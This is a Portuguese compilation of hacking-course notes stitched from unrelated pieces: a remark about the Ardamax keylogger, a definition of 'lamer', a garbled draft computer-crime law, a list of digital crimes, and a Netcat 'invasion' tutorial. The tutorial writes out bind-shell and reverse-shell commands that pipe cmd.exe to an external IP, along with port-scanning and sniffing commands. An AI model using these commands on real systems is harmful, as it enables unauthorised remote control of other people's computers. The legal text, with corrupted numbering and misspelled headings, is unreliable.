O Ardamax é um dos keylogger´s mais usados na Internet, e inclusive neste computador, que monitorou tudo o que aconteceu durante o nosso mini curso. As empresas cada vez mais utiliza este tipo de programa para “monitorar” o que seus funcionários fazem, por isso, tomem cuidado quando estiverem na empresa, nunca pense que ninguém está olhando!!!!

Tutorial Lamer

O termo Lamer indica uma pessoa que acredita que é um hacker (decifrador), demonstra grande arrogância, no entanto sabe pouco ou muito pouco e é geralmente malicioso. Utilizam ferramentas criadas por Crackers para demonstrar sua suposta capacidade ou poder, na intenção de competir por reputação, no entanto são extremamente inconvenientes para convívio social, mesmo com outros hackers. Algumas pessoas acreditam que essa é uma fase natural do aprendizado, principalmente quando o conhecimento vem antes da maturidade. Lamer's geralmente atacam colegas de trabalho ou colegas de estudo, sempre com menos aprendizado, e estes se aterrorizam, aumentando a arrogânica do lamer.

Tutorial Leis Digitais

CAPÍTULO 1

Dos princípios que regulam a prestação de serviço por redes de computadores.

Artigo Primeiro- O acesso, o processamento e a disseminação de informações através das redes de computadores devem estar a serviço do cidadão e da sociedade, respeitados os critérios de garantia dos direitos individuais e coletivos e de privacidade e segurança de pessoas físicas e jurídicas e da garantia de acesso às informações disseminadas pelos serviços de rede.

Artigo Segundo- É livre a estruturação e o funcionamento das redes de computadores e seus serviços, ressalvadas disposições específicas reguladas em lei.


CAPÍTULO 2

Do uso de informações disponíveis em computadores ou redes de computadores.

Artigo Terceiro- Para fins desta lei, entende-se por informações privadas aquelas relativas à pessoa física ou jurídica identificada ou identificável.

Parágrafo Único - É identificável a pessoa cuja individualização não envolva custos ou prazos desproporcionados.

Artigo Quarto- Ninguém será obrigado a fornecer informações sobre sua pessoa ou de terceiros, salvo nos casos previstos em lei.

Artigo Quinto- A coleta, o processamento e a distribuição, com finalidades comerciais, de informações privadas ficam sujeitas à prévia aquiescência da pessoa a que se referem, que poderá ser tornada sem efeito a qualquer momento, ressalvando-se o pagamento de indenizações a terceiros, quando couberem.

§1. A toda pessoa cadastrada dar-se-á conhecimento das informações privadas armazenadas e das retrospectivas fontes.

§ 2. Fica assegurado o direito à retificação de qualquer informação privada incorreta.

§ 3. Salvo a disposição legal ou determinação judicial em contrário, nenhuma informação privada será mantida à revelia da pessoa a que se refere ou além do tempo previsto para a sua vaidade.

§ 4. Qualquer pessoa, física ou jurídica, tem o direito de interpelar o proprietário de rede de computadores ou o provedor de serviço para saber se mantém as informações a seu respeito, e o respectivo teor.

Artigo Sexto- Os serviços de informações ou de acesso a bancos de dados não distribuirão informações privadas referentes, direta ou indiretamente, a origem racial, opinião pública, filosófica, religiosa ou de orientação sexual, e de filiação a qualquer entidade, pública ou privada, salvo autorização expressa do interessado.

Artigo Sétimo- O acesso de terceiros, não autorizados pelos respectivos interessados, à informações privadas mantidas em redes de computadores dependerá de prévia autorização judicial.


CAPÍTULO 3

Dos crimes de informática.

Seção I ¼ Dano a dado ou programa de computador.

Artigo Oitavo- Apagar, destruir, modificar ou de qualquer forma inutilizar, total ou parcialmente, dado ou programa de computador, de forma indevida ou não autorizada.

PENA: detenção, de um a três anos e multa.

Parágrafo único = Se o crime é cometido:

I ¼ contra o interesse da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

II ¼ com considerável prejuízo da vítima;

III- com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

IP ¼ com abuso de confiança;

P ¼ por motivo fútil;

PI - com o uso indevido de senha ou processo de identificação de terceiro; ou

PII ¼ com a utilização de qualquer outro meio fraudulento.

PENA: detenção, de dois a quatro anos e multa.

Seção II ¼ Acesso indevido ou não autorizado

Artigo Nono- Obter acesso, indevido ou não autorizado, a computador ou rede de computadores.

PENA: detenção, de seis meses a um ano e multa.

Parágrafo Primeiro: Na mesma pena incorre quem, sem autorização ou indevidamente, obtém, mantém ou fornece a terceiro qualquer meio de identificação ou acesso a computador ou rede de computadores.

Parágrafo Segundo - Se o crime é cometido;

I ¼ com acesso a computador ou rede de computadores da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

II ¼ com o considerável prejuízo para a vítima;

III ¼ com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

I - com abuso de confiança;

P ¼ por motivo fútil;

PI ¼ com o uso indevido de senha ou processo de identificação de terceiro; ou

PII ¼ com a utilização de qualquer outro meio fraudulento.

PENA: detenção, de um a dois anos e multa.

Seção III ¼ Alteração de senha ou mecanismo de acesso a programa de computador ou dados.

Artigo Décimo- Apagar, destruir, alterar, ou de qualquer forma inutilizar, senha ou qualquer outro mecanismo de acesso a computador, programa de computador ou dados, de forma indevida ou não autorizada.

PENA: detenção, de um a dois anos e multa.

Seção IP - Obtenção indevida ou não autorizada de dado ou instrução de computador.

Artigo Décimo Primeiro- Obter, manter ou fornecer, sem autorização ou indevidamente, dado ou instrução de computador.

PENA: detenção, de três meses a um ano e multa.

Parágrafo Único - Se o crime é cometido:

I ¼ com acesso a computador ou rede de computadores da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

II ¼ com considerável prejuízo para a vítima;

III ¼ com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

IP ¼ com abuso de confiança;

P ¼ por motivo fútil;

PI ¼ com o uso indevido de senha ou processo de identificação de terceiro; ou

PII ¼ com a utilização de qualquer outro meio fraudulento.

PENA: detenção, de um a dois anos e multa.

Seção P ¼ Piolação de segredo armazenado em computador, meio magnético, de natureza magnética, óptica ou similar

Artigo Décimo Segundo- Obter segredos, de industria, ou comércio, ou informações pessoais armazenadas em computador, rede de computadores, meio eletrônico de natureza magnética, óptica ou similar, de forma indevida ou não autorizada.

PENA: detenção, de um a três anos e multa.

Seção PI ¼ Criação, desenvolvimento ou inserção em computador de dados ou programa de computador com fins nocivos

Artigo Décimo terceiro- Criar, desenvolver ou inserir, dado ou programa em computador ou rede de computadores, de forma indevida ou não autorizada, com a finalidade de apagar, destruir, inutilizar ou modificar dado ou programa de computador ou de rede de computadores, dificultar ou impossibilitar, total ou parcialmente, a utilização de computador ou rede de computadores.

PENA: reclusão, de um a três anos e multa.

Parágrafo Único - Se o crime é cometido:

I ¼ contra o interesse da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

II ¼ com considerável prejuízo para a vítima;

III ¼ com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

IP ¼ com abuso de confiança;

P ¼ por motivo fútil;

PI ¼ com o uso indevido de senha ou processo de identificação de terceiro; ou

PII ¼ com a utilização de qualquer outro meio fraudulento.

PENA: reclusão, de dois a seis anos e multa.

Seção PII - Peiculação de pornografia através de rede de computadores.

Artigo Décimo Quarto- Oferecer serviço ou informação de caráter pornográfico, em rede de computadores, sem exibir, previamente, de forma facilmente visível e destacada, aviso sobre a natureza, indicando o seu conteúdo e a inadequação para a criança ou adolescentes.

PENA: detenção, de um a três anos e multa.


CAPÍTULO 4

Das disposições finais.

Artigo Décimo Quinto- Se qualquer dos crimes previstos nesta lei é praticado no exercício de atividade profissional ou funcional, a pena é aumentada de um sexto até a metade.

Artigo Décimo Sexto- Nos crimes definidos nesta lei somente se procede mediante representação do ofendido, salvo se cometidos contra o interesse da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta, empresa concessionária de serviços públicos, fundações instituídas ou mantidas pelo poder público, serviços sociais autônomos, instituições financeiras ou empresas que explorem ramo de atividade controlada pelo poder público, casos em que a ação é pública incondicionada.

Artigo Décimo Sétimo- Esta lei regula os crimes relativos à informática sem prejuízo das demais cominações previstas em outros diplomas legais.

Artigo Décimo Oitavo- Esta lei entra em vigor 30 (trinta) dias a contar da data de sua publicação.



ALGUNS CRIMES DIGITAIS

Ação: Enviar mensagem alarmante, como a da existência de um novo vírus, e recomendar a retransmissão do arquivo para o maior número de pessoas possível, causando sobrecargas em sistemas como o do ICQ.

Pena: detenção de 3 meses a 1 ano ou multa (correspondente ao art.146; constrangimento ilegal)

Ação: Enviar e-mail com ameaça de agressão.

Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.147; ameaça)

Ação: Abrir e-mail alheio sem autorização.

Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.151; violação de correspondência)

Ação: Invadir um computador e apagar os dados ou enviar um vírus pela Internet

Pena: detenção de 1 a 6 meses ou multa (correspondente ao art.163; dano)

Ação: Fazer compras na rede com números falsos de cartão de crédito ou outro

documento.

Pena: reclusão de 1 a 5 meses ou multa (correspondente ao art.171; estelionato)

Ação: Colocar fotos de sexo explícito ou pedofilia em uma home page.

Pena: detenção de 6 meses a 2 anos ou multa (correspondente ao art.234; escrito ou objeto obsceno)

Ação: Montar sites com receitas de bombas, ensinamentos de como destruir carros e fazer ligações de celulares sem pagar.

Pena: detenção de 3 meses a 6 meses ou mult

Netcat tutorial de invasao

O Netcat é uma ferramenta simples e eficaz para realização de consultoria em redes. Devido à sua versatilidade, o programa chegou a ser considerado o canivete suíço do TCP/IP pela maioria dos usuários, principalmente hackers. Possui versões para Linux e Windows.

Uma vez baixado e extraído, você deverá acessar o programa a partir do prompt de comando. Para fazer isso, acesse, primeiramente, o diretório, com o comando cd diretório. Veja um exemplo:

cd c:\windows\system32\

Nesse caso, o executável do Netcat está na pasta system32. Poderia estar em qualquer outro diretório, até mesmo no desktop, ou pastas dos Meus Documentos. Estando dentro do diretório, que contém o executável, basta você dar os comandos específicos do programa, como mostrado logo mais.

Obs.: Se você copiou o executável para a pasta system32, não precisará dar o comando para acessar o diretório, quando for utilizar o programa.

O funcionamento básico do programa pode ser comparado a um telnet (também presente em versões para ambas as plataformas). Com ele você pode se conectar a qualquer porta de um micro que esteja rodando determinado serviço. O diferencial do Netcat em relação ao telnet, está no fato dele possuir várias opções adicionais. Com ele você pode se conectar ao shell de um sistema remoto, fazer um escaneamento de portas, um sniffing, etc.


Por se tratar de um programa em modo texto, ele precisa ser chamado da mesma forma que os executáveis do sistema, dando-se o nome, seguido dos parâmetros. Veja uma lista com a função de alguns deles:

-d: coloca o netcat em modo furtivo, desligado do console.
-e: especifica um programa a ser executado (Ex.: nc -e cmd.exe).
-h: lista todas as opções do programa(Ex.: nc -h).
-l: coloca uma porta em estado de escuta.
-L: coloca uma porta em estado de escuta avançado. Reconecta se a conexão cair.
-n: não retorna domínios, só IPs.
-o: gera um log do tráfego em hexadecimal.
-p: define uma porta local (Ex.: nc -p 14).
-v: ativa o recebimento de eco, que permite saber o que está acontecendo no sistema durante a execução de determinado comando. Recomenda-se utilizá-lo duas vezes(Ex.: nc -vv).

Acessando um shell remoto

Conexão direta

O primeiro requerimento para se estabelecer uma conexão entre dois computadores é que ambos possuam um protocolo comum instalado, no caso, o TCP/IP, que é padrão da Internet. Por default, todos os sistemas operacionais atuais já o trazem instalado. Em seguida vale lembrar que cada micro pode ter, teoricamente, até 65.535 portas rodando determinados serviços, como o FTP (porta 21), Telnet (porta 23), SMTP (porta 25), HTTP (porta 80), etc...

O primeiro passo para se realizar a conexão, sendo esta direta ou reversa, é abrir uma ou algumas portas, para que haja a comunicação. O Netcat permite abrir portas em pouquíssimos segundos.

No micro que será acessado, abra o prompt de comando e digite o seguinte código:

nc -L -p 14 -vv -e cmd.exe

No código demonstrado, o parâmetro -L fará o programa escutar de modo avançado na porta 14 e nela rodar o executável cmd.exe, que é o prompt de comando do sistema. O parâmetro -vv ( não confunda os dois "Vs" com um "W") permite que você veja o que está acontecendo no sistema durante a execução do comando. A partir deste momento, o micro passa a agir como um servidor, permitindo que outros micros o acessem e explorem o recurso compartilhado, no caso, o shell do sistema. Veja:


Com o módulo servidor rodando, chegou a hora de conectar. No micro cliente, abra o prompt de comando e digite:

nc IPdoservidor 14

Por exemplo, se o endereço do servidor for 192.168.1.2, o comando ficaria assim:

nc 192.168.1.2 14

Se você não possui dois ou mais computadores, experimente usar o endereço de loopback 127.0.0.1, ou então o IP do seu próprio micro.

Nesta etapa da conexão, você pode até mesmo substituir o Netcat pelo telnet, obtendo o mesmo resultado, veja:

telnet 192.168.1.2 14

Esta é uma maneira bastante simples de acesso remoto que, permite em poucos segundos, obter o shell de um sistema. A partir deste ponto, você pode executar praticamente todos os comandos que são interpretados pelo prompt, afim de abrir ou copiar arquivos, editar configurações, visualizar imagens, etc...

Conexão reversa

A partir da criação do protocolo TCP/IP, ficou muito fácil realizar conexões entre diferentes computadores, não importando em qual ponto do planeta estejam, tanto é, que surgiu a Internet, a mãe de todas as redes. O problema surge quando precisamos nos conectar a um computador que esteja numa Intranet (rede privada), onde todos os micros recebem a conexão de um servidor. Esses computadores recebem endereços IP privados, ou seja, só são acessíveis dentro da rede. Geralmente eles começam com os octetos 192.168.1.x. Então, como acessá-los?

Computadores que utilizem endereços privados, só podem ser acessados externamente pelo que chamamos de conexão reversa. Esta permite que o processo de conexão seja realizado ao contrário do que seria o normal (a conexão direta). Consiste em fazer o micro interno (da rede) se conectar ao micro externo, que está conectado diretamente à Internet. Veja como isso pode ser feito no Netcat:

O primeiro passo seria abrir duas portas no micro cliente. Abra duas janelas do prompt de comando.

Na primeira digite:

nc -L -p 14 -vv

Este comando fará o programa escutar de modo avançado na porta 14.

E na segunda:
nc -L -p 15 -vv

O comando fará o mesmo que o anterior, mas escutará a porta 15.

Veja as duas janelas do shell:





Neste caso não utilizamos o parâmetro -e cmd.exe, pois agora o comando estará rodando no cliente e o Netcat irá "puxar" o shell do sistema do servidor. O código abaixo deve ser rodado no servidor:

nc -n IPdocliente 14 | cmd.exe | nc -n IPdocliente 15

Se o IP do cliente é 201.90.50.95, por exemplo, o comando ficaria da seguinte forma:

nc -n 201.90.50.95 14 | cmd.exe | nc -n 201.90.50.95 15

Obs.: o sinal de pipe "|" serve para concatenar (relacionar) a saída de um comando para a entrada de outro.

Ao rodar este comando, o micro servidor se conecta ao cliente na porta 14, passa o que for recebido durante a conexão para o shell do sistema e envia o resultado para o mesmo cliente, porém na porta 15, permitindo assim obter o shell do sistema. A janela que você utilizou para abrir a porta 14, agora servirá para digitar os comandos, que serão concatenados para a segunda janela, onde foi aberta a porta quinze. Veja um exemplo, onde eu peço para mostrar os diretórios:



Realizando um escaneamento de portas

Entre algumas das opções adicionais do programa, está a possibilidade de se fazer um scanner de portas (veja um artigo completo sobre isso, clicando aqui), que consiste em procurar portas que, eventualmente estejam abertas em determinado computador. Na verdade ele realisará a função básica de um scanner de portas, que é sondá-las e verificar se estão ou não abertas. A sintaxe do comando é bem simples:

nc -vv [Endereço IP] [Intervalo de portas] "não considere os colchetes"

Por exemplo, se eu queira verificar quais portas estão abertas num micro com o IP 192.168.1.2, faria da seguinte forma:

nc -vv 192.168.1.2 1-65535

Isso é apenas um exemplo, você pode utilizar um intervalo menor, ou então especificar apenas algumas portas a serem verificadas, separando-as por espaços:

nc -vv 192.168.1.2 21 23 25 80 110



A análise do resultado é simples. Se a porta estiver aberta, no final da linha aparecerá "open", caso contrário, será exibido "connection refused".

Sniffer com o Netcat

Sniffers são programas utilizados para interceptar e registrar o tráfego de dados em uma rede de computadores. Em outras palavras, eles "farejam" e registram tudo o que passa pela rede. Para utilizá-los, é imprescindível que ele seja instalado no mesmo segmento de rede, onde você quer obter os dados.

Veja um exemplo de como fazer um sniffing com o Netcat:

nc -L -vv 127.0.0.1 -p 21

O código acima irá registrar todo o tráfego realizado na porta 21 (FTP). Se você quiser gravar todas as informações obtidas num arquivo de texto, digite o mesmo comando acima, porém acrescentando o diretório para salvar (veja em negrito):